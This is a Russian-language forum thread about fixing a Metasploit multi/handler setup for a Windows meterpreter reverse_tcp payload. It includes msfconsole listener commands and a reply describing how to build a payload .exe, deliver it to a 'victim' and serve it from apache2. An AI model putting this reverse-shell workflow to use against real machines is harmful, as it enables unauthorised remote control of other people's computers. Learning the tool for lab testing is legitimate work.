Проблема с Metasploit'ом

[WHello]

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?

 

[s unity]

сессия запущена, но сам meterpreter не активен

фаервол не дает запуститься метерупретеру (на обновленных машинах не работает). это единственная причина, которую я могу выдвинуть по этому поводу. проблема очень актуальна, и никто не может дать внятный ответ. можешь попробовать запустить exploit -j и когда прилетит сессия попробовать ее открыть sessions -i 1 (кому то помогает, мне не помогло)

 

[s unity]

reverse TCP handler вроде бы запустился, а payload handler не стартует

что ты имеешь ввиду? reverse это реверсивное соединение (от точки Б к точке А), а TCP это протокол передачи данных.
handler - это можно считать названием утилиты, при запуске которой открывается указанный тобой порт (set LHOST 4444) и слушает его
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp - это значение, которое ты вписываешь, не сам пэйлоад, ты указываешь утилите handler какой payload прилетит на порт 4444 от жертвы.
другими словами ты сначала создаешь вирус .exe в котором сидит payload (windows/meterpreter/reverse_tcp) и доставляешь его жертве, когда он его запускает, payload начинает пытаться отправлять данные на указзанный тобой ипишник по порту 4444. тебе нужно словить все эти пакеты, но как это сделать? для это и есть handler (ловить пакеты и обрабатывать)

пожалуйста.

 

[Даня Прикольный]

А почему значения LPORT и LHOST перепутаны местами?

Так и есть))

 

[Сергей Попов]

ты вместо LHOST указал порт, а вместо LPORT хост соответственно.
Всё так и должно быть
Посмотреть вложение 15531

@vasja91vv - мы внимательно наблюдаем за действиями участников. Прошу объяснить Ваш дизлайк этому сообщению.

 

[s unity]

мы внимательно наблюдаем за действиями участников

Интересненько... на мои записи тоже есть необоснованные дизлайки. Даже наоборот я подметил что однв программа из списка в статье не работает, а мне два диза влепили

 

[Сергей Попов]

Интересненько... на мои записи тоже есть необоснованные дизлайки. Даже наоборот я подметил что однв программа из списка в статье не работает, а мне два диза влепили

Для решения подобных проблем есть кнопка

Жмете и описываете суть проблемы.

 

[Дмитрий Сигай]

Что делать?
Нет подключения при команде db_status

 

[s unity]

Что делать?
Нет подключения при команде db_status

вообще делается service postgresql start и потом msfconsole

 

[lomini]

вообще делается service postgresql start и потом msfconsole

Не забудь создать в самом постгресе базу и юзера с пассом который такой же как и у твоем database.yml , Некоторые почему то забывают это сделать .
И вообще для новичков , я думаю лучше узать Армитаж Гуи для меты , что бы было немного проще со всем этим делом разобраться.

 

[Tafi]

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?

Подскажите, что я делаю не правильно .
Создаётся странный сервер . Там нет возможности скачать файл.

 

[BearSec]

Подскажите, что я делаю не правильно .
Создаётся странный сервер . Там нет возможности скачать файл.

Судя по скриншотам, у тебя нормально запущен apache2.
В /var/www/html/ у тебя есть index.html, по этому когда ты вводишь ip адрес сервера в браузере, у тебя автоматом грузится index.html.
Можешь его переименовать или удалить и тогда у тебя покажется список файлов (со стандартными настройками apache2 спокойной отдает список файлов)

Multi/handler у тебя не запускается на порту 443 как раз из-за того, что apache2 занимает этот порт. Укажи другой свободный порт, либо выключай apache2, либо поменяй стандартные порты используемые apache2 в /etc/apache2/...
И когда генерировал пейлоад, ты тоже указал порт 443 учитывай это. (либо переделай пейлоад под другой порт, либо после скачивания файла с веб сервера не забудь погасить службу)

Ну и лучше создай для своей проблемы отдельную тему, будет удобнее